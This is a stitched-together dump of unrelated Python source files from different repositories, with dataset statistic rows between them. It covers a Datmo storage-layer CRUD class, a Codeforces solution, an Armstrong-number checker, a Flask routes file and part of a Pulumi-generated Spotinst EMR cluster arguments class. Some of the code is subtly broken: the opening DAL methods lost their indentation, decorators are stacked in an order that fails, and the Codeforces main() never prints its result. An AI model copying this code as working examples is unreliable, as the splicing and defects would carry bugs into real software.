def __init__(self, driver_type, driver_options, driver=None):
self.driver_type = driver_type
self.driver_options = driver_options
self.driver = driver
self._is_initialized = self.is_initialized
@property
def is_initialized(self):
if os.path.isdir(self.driver_options['connection_string']):
self._is_initialized = True
# set the driver so it is available
if not self.driver:
if self.driver_type == "blitzdb":
self.driver = BlitzDBDALDriver(**self.driver_options)
return self._is_initialized
self._is_initialized = False
return self._is_initialized
@property
def model(self):
"""Model CRUD methods
Returns
-------
ModelMethods
Specific set of CRUD functions for model
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return ModelMethods(self.driver)
@property
def code(self):
"""Code CRUD methods
Returns
-------
CodeMethods
Specific set of CRUD functions for code
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return CodeMethods(self.driver)
@property
def environment(self):
"""Environment CRUD methods
Returns
-------
EnvironmentMethods
Specific set of CRUD functions for environment
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return EnvironmentMethods(self.driver)
@property
def file_collection(self):
"""FileCollection CRUD methods
Returns
-------
FileCollectionMethods
Specific set of CRUD functions for file collection
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return FileCollectionMethods(self.driver)
@cache
@property
def task(self):
"""Task CRUD methods
Returns
-------
TaskMethods
Specific set of CRUD functions for task
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return TaskMethods(self.driver)
@cache
@property
def snapshot(self):
"""Snapshot CRUD methods
Returns
-------
SnapshotMethods
Specific set of CRUD functions for snapshot
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return SnapshotMethods(self.driver)
@cache
@property
def user(self):
"""User CRUD methods
Returns
-------
UserMethods
Specific set of CRUD functions for user
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return UserMethods(self.driver)
def init(self):
if not self.driver:
if self.driver_type == "blitzdb":
self.driver = BlitzDBDALDriver(**self.driver_options)
class EntityMethodsCRUD(object):
    """Generic CRUD operations for one entity collection.

    Parameters
    ----------
    collection : str
        name of the backing collection (e.g. "model", "task")
    entity_class : type
        entity wrapper applied to every document returned by the driver
    driver : datmo.core.storage.driver.DALDriver
        backend used for the actual reads and writes
    """

    def __init__(self, collection, entity_class, driver):
        self.collection = collection
        self.entity_class = entity_class
        self.driver = driver

    def get_by_id(self, entity_id):
        """Return the entity whose id is `entity_id`."""
        document = self.driver.get(self.collection, entity_id)
        return self.entity_class(document)

    def get_by_shortened_id(self, shortened_entity_id):
        """Return the entity matching a shortened (prefix) id."""
        document = self.driver.get_by_shortened_id(self.collection,
                                                   shortened_entity_id)
        return self.entity_class(document)

    def create(self, datmo_entity):
        """Persist a new entity and return its stored representation."""
        # normalize the input into a plain dictionary (document) to be stored
        if hasattr(datmo_entity, 'to_dictionary'):
            document = datmo_entity.to_dictionary()
        else:
            document = self.entity_class(datmo_entity).to_dictionary()
        # keep a caller-provided non-empty id; otherwise mint a unique hash
        # TODO: find efficient way to get previous hash for entity
        # latest_entity = self.query({"id": latest})
        # document['id'] = create_unique_hash(base_hash=latest_entity['id'])
        if not ('id' in document.keys() and document['id']):
            document['id'] = create_unique_hash()
        stored = self.driver.set(self.collection, document)
        return self.entity_class(stored)

    def update(self, datmo_entity):
        """Update an entity; accepts an entity object or a partial dict
        that contains at least a non-empty 'id'."""
        if hasattr(datmo_entity, 'to_dictionary'):
            document = datmo_entity.to_dictionary()
        else:
            if 'id' not in list(datmo_entity) or not datmo_entity['id']:
                raise InputError(__("error", "storage.local.dal.update"))
            # merge: take updated values from the input dict, fall back to
            # the stored entity's attributes for everything else
            existing = self.get_by_id(datmo_entity['id'])
            document = {}
            for key in existing.to_dictionary():
                if key in list(datmo_entity):
                    document[key] = datmo_entity[key]
                else:
                    document[key] = getattr(existing, key)
        # stamp the modification time on every update
        document['updated_at'] = datetime.utcnow()
        stored = self.driver.set(self.collection, document)
        return self.entity_class(stored)

    def delete(self, entity_id):
        """Remove the entity with `entity_id`; returns the driver's result."""
        return self.driver.delete(self.collection, entity_id)

    def query(self, query_params, sort_key=None, sort_order=None):
        """Return all matching entities, optionally sorted."""
        documents = self.driver.query(self.collection, query_params,
                                      sort_key, sort_order)
        return [self.entity_class(document) for document in documents]

    def findOne(self, query_params):
        """Return the single entity matching `query_params`.

        Raises EntityNotFound when nothing matches and
        MoreThanOneEntityFound when the match is ambiguous.
        """
        matches = self.query(query_params)
        if not matches:
            raise EntityNotFound()
        if len(matches) > 1:
            raise MoreThanOneEntityFound()
        return matches[0]
#
# https://stackoverflow.com/questions/1713038/super-fails-with-error-typeerror-argument-1-must-be-type-not-classobj
#
#
# Datmo Entity methods
#
class ModelMethods(EntityMethodsCRUD):
    """CRUD accessors for Model entities (the 'model' collection)."""

    def __init__(self, driver):
        super().__init__('model', Model, driver)
class CodeMethods(EntityMethodsCRUD):
    """CRUD accessors for Code entities (the 'code' collection)."""

    def __init__(self, driver):
        super().__init__('code', Code, driver)
class EnvironmentMethods(EntityMethodsCRUD):
    """CRUD accessors for Environment entities (the 'environment' collection)."""

    def __init__(self, driver):
        super().__init__('environment', Environment, driver)
class FileCollectionMethods(EntityMethodsCRUD):
    """CRUD accessors for FileCollection entities ('file_collection' collection)."""

    def __init__(self, driver):
        super().__init__('file_collection', FileCollection, driver)
class TaskMethods(EntityMethodsCRUD):
    """CRUD accessors for Task entities (the 'task' collection)."""

    def __init__(self, driver):
        super().__init__('task', Task, driver)
class SnapshotMethods(EntityMethodsCRUD):
    """CRUD accessors for Snapshot entities (the 'snapshot' collection)."""

    def __init__(self, driver):
        super().__init__('snapshot', Snapshot, driver)
class UserMethods(EntityMethodsCRUD):
    """CRUD accessors for User entities (the 'user' collection)."""

    def __init__(self, driver):
        super().__init__('user', User, driver)
| 29.84858 | 123 | 0.629148 | 8,603 | 0.909216 | 0 | 0 | 3,031 | 0.320334 | 0 | 0 | 3,181 | 0.336187 |
635954cccfa45bc4cb0b41a99fdee38be3ae1775 | 358 | py | Python | CodeForces/StonesOnTheTable/StonesonTheTable.py | GeorgianBadita/algorithmic-problems | 6b260050b7a1768b5e47a1d7d4ef7138a52db210 | [
"MIT"
] | 1 | 2021-07-05T16:32:14.000Z | 2021-07-05T16:32:14.000Z | CodeForces/StonesOnTheTable/StonesonTheTable.py | GeorgianBadita/algorithmic-problems | 6b260050b7a1768b5e47a1d7d4ef7138a52db210 | [
"MIT"
] | null | null | null | CodeForces/StonesOnTheTable/StonesonTheTable.py | GeorgianBadita/algorithmic-problems | 6b260050b7a1768b5e47a1d7d4ef7138a52db210 | [
"MIT"
def main():
    """Read a stone count and a color string from stdin; return how many
    stones must be removed so that no two neighbouring stones share a color.

    Bug fix: the original kept the first input line as a *string* and
    compared it against the integers 0, 1 and 2, so those guards never
    fired and an empty color string crashed on ``string[0]``.
    """
    stone_count = int(input())
    colors = input()
    if stone_count <= 1:
        # zero or one stone: nothing can clash
        return 0
    removed = 0
    # a stone must be removed whenever it matches its left neighbour
    for left, right in zip(colors, colors[1:]):
        if left == right:
            removed += 1
    return removed
| 15.565217 | 35 | 0.432961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
635a1b194d242f8ac83aa8d4f19dfd8d49c42b24 | 573 | py | Python | app/routes.py | valtemirprocopio/forms | 05d819aad3d8c32c87b0f62a3c8e2b6fda8aa26e | [
"MIT"
] | null | null | null | app/routes.py | valtemirprocopio/forms | 05d819aad3d8c32c87b0f62a3c8e2b6fda8aa26e | [
"MIT"
] | null | null | null | app/routes.py | valtemirprocopio/forms | 05d819aad3d8c32c87b0f62a3c8e2b6fda8aa26e | [
"MIT"
] | null | null | null | from app import app
from flask import render_template, flash, redirect, url_for
from app.forms import LoginForm
@app.route('/')
@app.route('/index')
def index():
    """Serve the landing page at both '/' and '/index'."""
    return render_template('index.html')
@app.route('/contato', methods=['GET','POST'])
def contato():
    """Render the contact form; on a valid POST, flash a confirmation
    message and redirect back to the index page."""
    form = LoginForm()
    if form.validate_on_submit():
        # flash() stores the message in the session and returns None,
        # so binding its result (as the original did) was useless.
        flash('A mensagem foi enviada com sucesso.')
        # build the URL from the endpoint instead of hard-coding '/index'
        return redirect(url_for('index'))
    return render_template('contato.html', form=form)
@app.route('/features')
def features():
    """Serve the static features page."""
    return render_template('features.html')
| 22.92 | 63 | 0.678883 | 0 | 0 | 0 | 0 | 443 | 0.773124 | 0 | 0 | 129 | 0.225131 |
635c827babc0af053e69c6189ed75cae75ad2a0f | 336 | py | Python | Python/Math/Armstrong-Number/armstrong-number.py | manoj-paramsetti-testing/Algorithm-Warehouse | 89c41146a1c444605830016319e00c343fdbe154 | [
"MIT"
] | 4 | 2021-04-23T06:16:52.000Z | 2022-01-03T14:36:51.000Z | Python/Math/Armstrong-Number/armstrong-number.py | manoj-paramsetti-testing/Algorithm-Warehouse | 89c41146a1c444605830016319e00c343fdbe154 | [
"MIT"
] | 9 | 2021-04-12T02:56:35.000Z | 2021-06-19T00:43:04.000Z | Python/Math/Armstrong-Number/armstrong-number.py | manoj-paramsetti-testing/Algorithm-Warehouse | 89c41146a1c444605830016319e00c343fdbe154 | [
"MIT"
def is_armstrong(value: int) -> bool:
    """Return True if `value` equals the sum of its digits, each raised to
    the power of the digit count (an Armstrong / narcissistic number).

    The original script shadowed the builtin ``sum`` and ran unguarded at
    import time; it is now a pure, testable function.
    """
    if value < 0:
        # a sum of non-negative powers can never equal a negative number
        return False
    digits = str(value)
    power = len(digits)
    return value == sum(int(digit) ** power for digit in digits)


if __name__ == "__main__":
    num = int(input("Enter a number: "))
    if is_armstrong(num):
        print("It's an armstrong number")
    else:
        print("It's not an armstrong number")
| 17.684211 | 42 | 0.58631 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 74 | 0.220238 |
635cce5473f8750091e7f18d6db45331eaca5c07 | 174,251 | py | Python | sdk/python/pulumi_spotinst/aws/mr_scalar.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2019-12-21T20:50:43.000Z | 2021-12-01T20:57:38.000Z | sdk/python/pulumi_spotinst/aws/mr_scalar.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | 103 | 2019-12-09T22:03:16.000Z | 2022-03-30T17:07:34.000Z | sdk/python/pulumi_spotinst/aws/mr_scalar.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MrScalarArgs', 'MrScalar']  # public exports of this generated module
@pulumi.input_type
class MrScalarArgs:
    def __init__(__self__, *,
                 strategy: pulumi.Input[str],
                 additional_info: Optional[pulumi.Input[str]] = None,
                 additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 applications: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]] = None,
                 availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]] = None,
                 cluster_id: Optional[pulumi.Input[str]] = None,
                 configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]] = None,
                 core_desired_capacity: Optional[pulumi.Input[int]] = None,
                 core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]] = None,
                 core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
                 core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 core_lifecycle: Optional[pulumi.Input[str]] = None,
                 core_max_size: Optional[pulumi.Input[int]] = None,
                 core_min_size: Optional[pulumi.Input[int]] = None,
                 core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]] = None,
                 core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]] = None,
                 core_unit: Optional[pulumi.Input[str]] = None,
                 custom_ami_id: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
                 ec2_key_name: Optional[pulumi.Input[str]] = None,
                 expose_cluster_id: Optional[pulumi.Input[bool]] = None,
                 instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]] = None,
                 job_flow_role: Optional[pulumi.Input[str]] = None,
                 keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
                 log_uri: Optional[pulumi.Input[str]] = None,
                 managed_primary_security_group: Optional[pulumi.Input[str]] = None,
                 managed_replica_security_group: Optional[pulumi.Input[str]] = None,
                 master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]] = None,
                 master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
                 master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 master_lifecycle: Optional[pulumi.Input[str]] = None,
                 master_target: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 provisioning_timeout: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 release_label: Optional[pulumi.Input[str]] = None,
                 repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
                 retries: Optional[pulumi.Input[int]] = None,
                 scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]] = None,
                 security_config: Optional[pulumi.Input[str]] = None,
                 service_access_security_group: Optional[pulumi.Input[str]] = None,
                 service_role: Optional[pulumi.Input[str]] = None,
                 steps_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]] = None,
                 task_desired_capacity: Optional[pulumi.Input[int]] = None,
                 task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]] = None,
                 task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
                 task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 task_lifecycle: Optional[pulumi.Input[str]] = None,
                 task_max_size: Optional[pulumi.Input[int]] = None,
                 task_min_size: Optional[pulumi.Input[int]] = None,
                 task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]] = None,
                 task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]] = None,
                 task_unit: Optional[pulumi.Input[str]] = None,
                 termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]] = None,
                 termination_protected: Optional[pulumi.Input[bool]] = None,
                 visible_to_all_users: Optional[pulumi.Input[bool]] = None):
        """
        The set of arguments for constructing a MrScalar resource.
        :param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
        :param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
        :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        :param pulumi.Input[str] cluster_id: The MrScaler cluster id.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        :param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
        :param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
        :param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
        :param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]] core_scaling_down_policies: Scaling-down policies for the core group.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]] core_scaling_up_policies: Scaling-up policies for the core group.
        :param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
        :param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
        :param pulumi.Input[str] description: The MrScaler description.
        :param pulumi.Input[int] ebs_root_volume_size: Size of the EBS root device volume of the Linux AMI (presumably in GiB — confirm against the Spot API docs).
        :param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
        :param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
        :param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
        :param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
        :param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
        :param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
        :param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
        :param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
        :param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] master_target: Number of instances in the master group.
        :param pulumi.Input[str] name: The application name.
        :param pulumi.Input['MrScalarProvisioningTimeoutArgs'] provisioning_timeout: Timeout settings applied while provisioning cluster capacity.
        :param pulumi.Input[str] region: The MrScaler region.
        :param pulumi.Input[str] release_label: The EMR release label of the cluster (e.g. `emr-5.17.0`).
        :param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
        :param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]] scheduled_tasks: An array of scheduled tasks.
        :param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
        :param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
        :param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]] steps_files: Steps from S3.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]] tags: A list of tags to assign to the resource. You may define multiple tags.
        :param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
        :param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
        :param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
        :param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]] task_scaling_down_policies: Scaling-down policies for the task group.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]] task_scaling_up_policies: Scaling-up policies for the task group.
        :param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
        :param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
        :param pulumi.Input[bool] visible_to_all_users: Deprecated — this field has been removed from the Spot API and is no longer functional.
        """
        pulumi.set(__self__, "strategy", strategy)
        if additional_info is not None:
            pulumi.set(__self__, "additional_info", additional_info)
        if additional_primary_security_groups is not None:
            pulumi.set(__self__, "additional_primary_security_groups", additional_primary_security_groups)
        if additional_replica_security_groups is not None:
            pulumi.set(__self__, "additional_replica_security_groups", additional_replica_security_groups)
        if applications is not None:
            pulumi.set(__self__, "applications", applications)
        if availability_zones is not None:
            pulumi.set(__self__, "availability_zones", availability_zones)
        if bootstrap_actions_files is not None:
            pulumi.set(__self__, "bootstrap_actions_files", bootstrap_actions_files)
        if cluster_id is not None:
            pulumi.set(__self__, "cluster_id", cluster_id)
        if configurations_files is not None:
            pulumi.set(__self__, "configurations_files", configurations_files)
        if core_desired_capacity is not None:
            pulumi.set(__self__, "core_desired_capacity", core_desired_capacity)
        if core_ebs_block_devices is not None:
            pulumi.set(__self__, "core_ebs_block_devices", core_ebs_block_devices)
        if core_ebs_optimized is not None:
            pulumi.set(__self__, "core_ebs_optimized", core_ebs_optimized)
        if core_instance_types is not None:
            pulumi.set(__self__, "core_instance_types", core_instance_types)
        if core_lifecycle is not None:
            pulumi.set(__self__, "core_lifecycle", core_lifecycle)
        if core_max_size is not None:
            pulumi.set(__self__, "core_max_size", core_max_size)
        if core_min_size is not None:
            pulumi.set(__self__, "core_min_size", core_min_size)
        if core_scaling_down_policies is not None:
            pulumi.set(__self__, "core_scaling_down_policies", core_scaling_down_policies)
        if core_scaling_up_policies is not None:
            pulumi.set(__self__, "core_scaling_up_policies", core_scaling_up_policies)
        if core_unit is not None:
            pulumi.set(__self__, "core_unit", core_unit)
        if custom_ami_id is not None:
            pulumi.set(__self__, "custom_ami_id", custom_ami_id)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if ebs_root_volume_size is not None:
            pulumi.set(__self__, "ebs_root_volume_size", ebs_root_volume_size)
        if ec2_key_name is not None:
            pulumi.set(__self__, "ec2_key_name", ec2_key_name)
        if expose_cluster_id is not None:
            pulumi.set(__self__, "expose_cluster_id", expose_cluster_id)
        if instance_weights is not None:
            pulumi.set(__self__, "instance_weights", instance_weights)
        if job_flow_role is not None:
            pulumi.set(__self__, "job_flow_role", job_flow_role)
        if keep_job_flow_alive is not None:
            pulumi.set(__self__, "keep_job_flow_alive", keep_job_flow_alive)
        if log_uri is not None:
            pulumi.set(__self__, "log_uri", log_uri)
        if managed_primary_security_group is not None:
            pulumi.set(__self__, "managed_primary_security_group", managed_primary_security_group)
        if managed_replica_security_group is not None:
            pulumi.set(__self__, "managed_replica_security_group", managed_replica_security_group)
        if master_ebs_block_devices is not None:
            pulumi.set(__self__, "master_ebs_block_devices", master_ebs_block_devices)
        if master_ebs_optimized is not None:
            pulumi.set(__self__, "master_ebs_optimized", master_ebs_optimized)
        if master_instance_types is not None:
            pulumi.set(__self__, "master_instance_types", master_instance_types)
        if master_lifecycle is not None:
            pulumi.set(__self__, "master_lifecycle", master_lifecycle)
        if master_target is not None:
            pulumi.set(__self__, "master_target", master_target)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if provisioning_timeout is not None:
            pulumi.set(__self__, "provisioning_timeout", provisioning_timeout)
        if region is not None:
            pulumi.set(__self__, "region", region)
        if release_label is not None:
            pulumi.set(__self__, "release_label", release_label)
        if repo_upgrade_on_boot is not None:
            pulumi.set(__self__, "repo_upgrade_on_boot", repo_upgrade_on_boot)
        if retries is not None:
            pulumi.set(__self__, "retries", retries)
        if scheduled_tasks is not None:
            pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
        if security_config is not None:
            pulumi.set(__self__, "security_config", security_config)
        if service_access_security_group is not None:
            pulumi.set(__self__, "service_access_security_group", service_access_security_group)
        if service_role is not None:
            pulumi.set(__self__, "service_role", service_role)
        if steps_files is not None:
            pulumi.set(__self__, "steps_files", steps_files)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if task_desired_capacity is not None:
            pulumi.set(__self__, "task_desired_capacity", task_desired_capacity)
        if task_ebs_block_devices is not None:
            pulumi.set(__self__, "task_ebs_block_devices", task_ebs_block_devices)
        if task_ebs_optimized is not None:
            pulumi.set(__self__, "task_ebs_optimized", task_ebs_optimized)
        if task_instance_types is not None:
            pulumi.set(__self__, "task_instance_types", task_instance_types)
        if task_lifecycle is not None:
            pulumi.set(__self__, "task_lifecycle", task_lifecycle)
        if task_max_size is not None:
            pulumi.set(__self__, "task_max_size", task_max_size)
        if task_min_size is not None:
            pulumi.set(__self__, "task_min_size", task_min_size)
        if task_scaling_down_policies is not None:
            pulumi.set(__self__, "task_scaling_down_policies", task_scaling_down_policies)
        if task_scaling_up_policies is not None:
            pulumi.set(__self__, "task_scaling_up_policies", task_scaling_up_policies)
        if task_unit is not None:
            pulumi.set(__self__, "task_unit", task_unit)
        if termination_policies is not None:
            pulumi.set(__self__, "termination_policies", termination_policies)
        if termination_protected is not None:
            pulumi.set(__self__, "termination_protected", termination_protected)
        # deprecated: warn first, then still forward the value for backward compatibility
        if visible_to_all_users is not None:
            warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
            pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
        if visible_to_all_users is not None:
            pulumi.set(__self__, "visible_to_all_users", visible_to_all_users)
    @property
    @pulumi.getter
    def strategy(self) -> pulumi.Input[str]:
        """
        The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
        """
        return pulumi.get(self, "strategy")

    @strategy.setter
    def strategy(self, value: pulumi.Input[str]) -> None:
        # Store the new strategy on the underlying Pulumi resource args.
        pulumi.set(self, "strategy", value)
    @property
    @pulumi.getter(name="additionalInfo")
    def additional_info(self) -> Optional[pulumi.Input[str]]:
        """
        This is meta information about third-party applications that third-party vendors use for testing purposes.
        """
        return pulumi.get(self, "additional_info")

    @additional_info.setter
    def additional_info(self, value: Optional[pulumi.Input[str]]) -> None:
        # Store the new value on the underlying Pulumi resource args.
        pulumi.set(self, "additional_info", value)
    @property
    @pulumi.getter(name="additionalPrimarySecurityGroups")
    def additional_primary_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of additional Amazon EC2 security group IDs for the master node.
        """
        return pulumi.get(self, "additional_primary_security_groups")

    @additional_primary_security_groups.setter
    def additional_primary_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]) -> None:
        # Store the new value on the underlying Pulumi resource args.
        pulumi.set(self, "additional_primary_security_groups", value)
@property
@pulumi.getter(name="additionalReplicaSecurityGroups")
def additional_replica_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the core and task nodes.
"""
return pulumi.get(self, "additional_replica_security_groups")
@additional_replica_security_groups.setter
def additional_replica_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_replica_security_groups", value)
@property
@pulumi.getter
def applications(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]:
"""
A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
"""
return pulumi.get(self, "applications")
